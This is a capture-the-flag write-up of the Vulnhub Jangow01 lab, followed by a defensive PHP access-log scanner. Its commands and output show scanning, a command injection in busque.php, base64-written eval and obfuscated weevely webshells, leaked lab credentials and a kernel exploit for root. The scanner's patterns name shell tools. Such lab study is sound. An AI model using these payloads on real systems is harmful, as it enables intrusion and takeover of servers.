Number of Vulnhub machines per year

Year   Num
…      …
2018   65
2019   117
2020   223
2021   108
2022   1
It is hard not to feel some regret at the end of an era,
but at the same time I am glad I was able to take part during its best years
and enjoy the process while learning.
Thank you, Vulnhub & every author.
Thank you for what I learned and every wonderful challenge I enjoyed.
2023-02-14 06:59:27
Information gathering
Host discovery
nmap -sn 192.168.56.0/24 | grep -B 2 Virtual
Nmap scan report for 192.168.56.118
Host is up (0.00010s latency).
MAC Address: 08:00:27:BF:BA:62 (Oracle VirtualBox virtual NIC)
Port scan
nmap -sV -Pn -v -T5 -A 192.168.56.118
Nmap scan report for 192.168.56.118
Host is up (0.00016s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
| http-methods:
|_  Supported Methods: POST OPTIONS GET HEAD
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:BF:BA:62 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.2 - 4.9
Uptime guess: 0.041 days (since Tue Feb 14 06:38:08 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: 127.0.0.1; OS: Unix
Web path enumeration
dirb http://192.168.56.118/ -w
---- Scanning URL: http://192.168.56.118/ ----
+ http://192.168.56.118/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.118/site/
dirb http://192.168.56.118/site/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
---- Scanning URL: http://192.168.56.118/site/ ----
==> DIRECTORY: http://192.168.56.118/site/assets/
==> DIRECTORY: http://192.168.56.118/site/css/
+ http://192.168.56.118/site/index.html (CODE:200|SIZE:10190)
==> DIRECTORY: http://192.168.56.118/site/js/
==> DIRECTORY: http://192.168.56.118/site/wordpress/
Exploitation
Visit http://192.168.56.118/site/
Click the "Buscar" button in the top right corner;
it redirects to http://192.168.56.118/site/busque.php?buscar=
After some quick testing, a command execution vulnerability was found.
curl http://192.168.56.118/site/busque.php?buscar=ls
assets
busque.php
css
index.html
js
wordpress
Just in case, check whether there is a blacklist.
curl 'http://192.168.56.118/site/busque.php?buscar=cat+./busque.php'
<?php system($_GET['buscar']); ?>
Confirm write permission.
curl 'http://192.168.56.118/site/busque.php?buscar=ls+-la'
total 44
drwxr-xr-x 6 www-data www-data  4096 Feb 13 17:59 .
drwxr-xr-x 3 root     root      4096 Oct 31  2021 ..
-rw-r--r-- 1 www-data www-data  1584 Feb 13 17:59 \
drwxr-xr-x 3 www-data www-data  4096 Jun  3  2021 assets
-rw-r--r-- 1 www-data www-data    35 Jun 10  2021 busque.php
drwxr-xr-x 2 www-data www-data  4096 Jun  3  2021 css
-rw-r--r-- 1 www-data www-data 10190 Jun 10  2021 index.html
drwxr-xr-x 2 www-data www-data  4096 Jun  3  2021 js
drwxr-xr-x 2 www-data www-data  4096 Jun 10  2021 wordpress
curl 'http://192.168.56.118/site/busque.php?buscar=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Tried a reverse shell: failed.
Tried pulling a webshell over from a web server: failed.
It looks like outbound requests are blocked.
echo -n '<?php eval($_POST["BFL"]);?>' | base64
PD9waHAgZXZhbCgkX1BPU1RbIkJGTCJdKTs/Pg==
curl 'http://192.168.56.118/site/busque.php?buscar=echo+-n+PD9waHAgZXZhbCgkX1BPU1RbIkJGTCJdKTs/Pg==|base64+-d>bfl.php'
weevely generate Bufferfly BFL.php
cat BFL.php | base64
PD9waHAKJHo9JyRrPSI1TGJMMmNMMjhlTGMiOyRraD0iNDE1NmRiYUwwNTM1NyJMOyRrZj0iNzc3
MmYxOEwyTDg1YWIiOyRwPSJMJzsKJGw9J2JhTHNlNjRfZW5jb2RlKEBMTHhMKExAZ3pjb21McHJM
ZXNzKCRvKSwkaykpO3ByaW50KCIkcCRraCRyJGtmIik7fSc7CiRBPSd0Y0xoKCIvJGtoKC4rKUwk
a0xmLyIsQGZpbGVfZ2V0X2NvbnRMZW50cygicExocDovTC9pbnB1dEwiKSwkbSk9JzsKJHE9J3Js
ZUxuKCRMdClMOyRvPSIiO2ZvcigkaUw9MDskaTwkbDtMTCl7Zm9Mcigkaj0wO0woJGo8JExjJiYk
aTwkbCk7TCc7CiRUPSdMPTEpIEx7QG9MYl9zdGFydCgpTDtAZUx2YWwoQGd6dW5MY29tTHByZXNM
cyhAeChAYkxhc2U2NExfZGVjb2RlKCQnOwokdD0nJGorTCssJGkrKyl7TCRvLj0kdEx7JGl9XiRr
eyRqfUw7fX1yZUx0dXJMbiAkbzt9aWYgTChAcHJlZ19MbUxMYSc7CiRkPXN0cl9yZXBsYWNlKCdT
eicsJycsJ1N6Y3JlYXRTemVfU3pTemZTenVuU3pjdGlvbicpOwokWD0nbUxbTDFdKSwkaykpKTsk
TG89QG9MYl9nTGV0X2NvbnRMZW50THMoKTtAb2JfZW5MZF9jbGVMYW4oKTtMJHJMPUAnOwokdz0n
RVZsNUx0dTJjNExKYXdDdXZrTEwiO2Z1bmN0aW9MbiB4KCR0LExMJGspeyRjPXN0ckxsTGVuKCRr
KTskbD1zdCc7CiRmPXN0cl9yZXBsYWNlKCdMJywnJywkei4kdy4kcS4kdC4kQS4kVC4kWC4kbCk7
CiRVPSRkKCcnLCRmKTskVSgpOwo/Pgo=
curl 'http://192.168.56.118/site/bfl.php' --data "BFL=system('echo -n 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 | base64 -d > BFL.php');"
weevely http://192.168.56.118/site/BFL.php Bufferfly
That counts as getting a shell, I suppose.
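From the defender's side, the sequence above (probe commands through busque.php, then a base64-decoded webshell written next to it, then POSTs to the new file) leaves a clear trace in the Apache access log. The scanner below is an added example, not part of the original write-up: the log lines are constructed to mirror the requests made in this section, and the client IP, timestamps and user agents are assumptions.

```php
<?php
// Added example, not from the original write-up: flag requests whose "buscar"
// value looks like command injection, and requests to PHP files the site never
// shipped. The access-log lines are constructed for this example.
declare(strict_types=1);

const SAMPLE_LOG = <<<'LOG'
192.168.56.1 - - [14/Feb/2023:06:45:01 +0000] "GET /site/busque.php?buscar=wordpress HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.56.1 - - [14/Feb/2023:06:45:10 +0000] "GET /site/busque.php?buscar=ls HTTP/1.1" 200 61 "-" "curl/7.85.0"
192.168.56.1 - - [14/Feb/2023:06:45:30 +0000] "GET /site/busque.php?buscar=cat+./busque.php HTTP/1.1" 200 35 "-" "curl/7.85.0"
192.168.56.1 - - [14/Feb/2023:06:46:02 +0000] "GET /site/busque.php?buscar=echo+-n+PD9waHAgZXZhbCgkX1BPU1RbIkJGTCJdKTs/Pg==|base64+-d>bfl.php HTTP/1.1" 200 0 "-" "curl/7.85.0"
192.168.56.1 - - [14/Feb/2023:06:47:15 +0000] "POST /site/bfl.php HTTP/1.1" 200 0 "-" "curl/7.85.0"
LOG;

// Extract method, path and decoded query parameters from a combined-format line.
function parseRequest(string $line): ?array
{
    if (!preg_match('/"(GET|POST|HEAD) ([^ ?"]+)(?:\?([^ "]*))? HTTP/', $line, $m)) {
        return null;
    }
    parse_str($m[3] ?? '', $params);   // also turns "+" back into spaces
    return ['method' => $m[1], 'path' => $m[2], 'params' => $params];
}

// Return the reasons a "buscar" value looks like injection; empty if benign.
function injectionIndicators(string $value): array
{
    $reasons = [];
    if (preg_match('/[|;&`$<>]/', $value)) {
        $reasons[] = 'shell metacharacter';
    }
    if (preg_match('/^\s*(ls|cat|id|echo|uname|wget|curl|nc|bash|sh|python[23]?)\b/', $value)) {
        $reasons[] = 'starts with a shell command';
    }
    // Decode any base64-looking token and look for PHP code inside it.
    if (preg_match_all('/[A-Za-z0-9+\/]{16,}={0,2}/', $value, $blobs)) {
        foreach ($blobs[0] as $blob) {
            $decoded = base64_decode($blob, true);
            if ($decoded !== false && preg_match('/<\?php|eval\(|system\(/i', $decoded)) {
                $reasons[] = 'base64-encoded PHP payload';
                break;
            }
        }
    }
    return $reasons;
}

// Scan every line; $knownPhp is the list of PHP files the site legitimately has.
function scanLog(string $log, array $knownPhp = ['/site/busque.php']): array
{
    $alerts = [];
    foreach (explode("\n", trim($log)) as $n => $line) {
        $req = parseRequest($line);
        if ($req === null) {
            continue;
        }
        if (substr($req['path'], -4) === '.php' && !in_array($req['path'], $knownPhp, true)) {
            $alerts[] = ['line' => $n + 1, 'reasons' => ['request to unknown PHP file ' . $req['path']]];
        }
        $buscar = $req['params']['buscar'] ?? null;
        if (is_string($buscar) && ($reasons = injectionIndicators($buscar)) !== []) {
            $alerts[] = ['line' => $n + 1, 'reasons' => $reasons];
        }
    }
    return $alerts;
}

foreach (scanLog(SAMPLE_LOG) as $alert) {
    printf("line %d: %s\n", $alert['line'], implode(', ', $alert['reasons']));
}
```

Run with `php scan.php`: line 1 (a normal search) produces nothing, lines 2 and 3 are flagged for starting with a shell command, line 4 trips all three rules (the `|` and `>`, the leading `echo`, and a base64 token that decodes to `<?php eval(...)`), and line 5 is flagged because bfl.php is not a file the site ever shipped. The last rule is the cheapest and most robust one: a web root whose PHP file set is known does not need payload-pattern matching to notice a new .php file being requested.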
Privilege escalation
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
cat /var/www/html/.backup
$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
$conn = mysqli_connect($servername, $username, $password, $database);
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
cat /var/www/html/site/wordpress/config.php
<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
$conn = mysqli_connect($servername, $username, $password, $database);
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>
cat /etc/passwd | grep home
syslog:x:104:108::/home/syslog:/bin/false
jangow01:x:1000:1000:desafio02,,,:/home/jangow01:/bin/bash
SSH shows up in netstat, but it cannot be reached; presumably iptables is configured.
Log in through the VirtualBox console (peeked at the walkthrough for this).
After looking around, nothing of value turned up.
uname -a
Linux jangow01 4.4.0-31-generic
https://www.exploit-db.com/exploits/45010
Save the exploit file locally.
Compile it.
Upload it with weevely and make it executable.
:file_upload ./exp /tmp/exp
chmod +x /tmp/exp
Run it as jangow01 in the VirtualBox terminal.
cat /root/proof.txt
[ASCII-art JANGOW banner]
da39a3ee5e6b4b0d3255bfef95601890afd80709
Network issues
iptables -L
...
Chain ufw-user-forward (1 references)
target     prot opt source               destination

Chain ufw-user-input (1 references)
target     prot opt source               destination
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ftp
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http
ACCEPT     udp  --  anywhere             anywhere             udp dpt:http

Chain ufw-user-limit (0 references)
target     prot opt source               destination
LOG        all  --  anywhere             anywhere             limit: avg 3/min burst 5 LOG level warning prefix "[UFW LIMIT BLOCK] "
REJECT     all  --  anywhere             anywhere             reject-with icmp-port-unreachable

Chain ufw-user-limit-accept (0 references)
target     prot opt source               destination
ACCEPT     all  --  anywhere             anywhere

Chain ufw-user-logging-forward (0 references)
target     prot opt source               destination

Chain ufw-user-logging-input (0 references)
target     prot opt source               destination

Chain ufw-user-logging-output (0 references)
target     prot opt source               destination

Chain ufw-user-output (1 references)
target     prot opt source               destination
ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:https
ACCEPT     udp  --  anywhere             anywhere             udp dpt:https
This is the first time I have seen iptables configured to block reverse shells, and I did waste some time on it.
Having SSH available but being forced to log in through the VirtualBox console instead
is unconventional; a bit of a gimmick.
localectl
   System Locale: LANG=pt_BR.UTF-8
                  LANGUAGE=pt_BR:pt:en
                  LC_NUMERIC=pt_BR
                  LC_TIME=pt_BR
                  LC_MONETARY=pt_BR
                  LC_PAPER=pt_BR
                  LC_NAME=pt_BR
                  LC_ADDRESS=pt_BR
                  LC_TELEPHONE=pt_BR
                  LC_MEASUREMENT=pt_BR
                  LC_IDENTIFICATION=pt_BR
       VC Keymap: n/a
      X11 Layout: br
       X11 Model: a4techKB21
But it is easier to type on than the Spanish keyboard last time.
References
WP (walkthrough)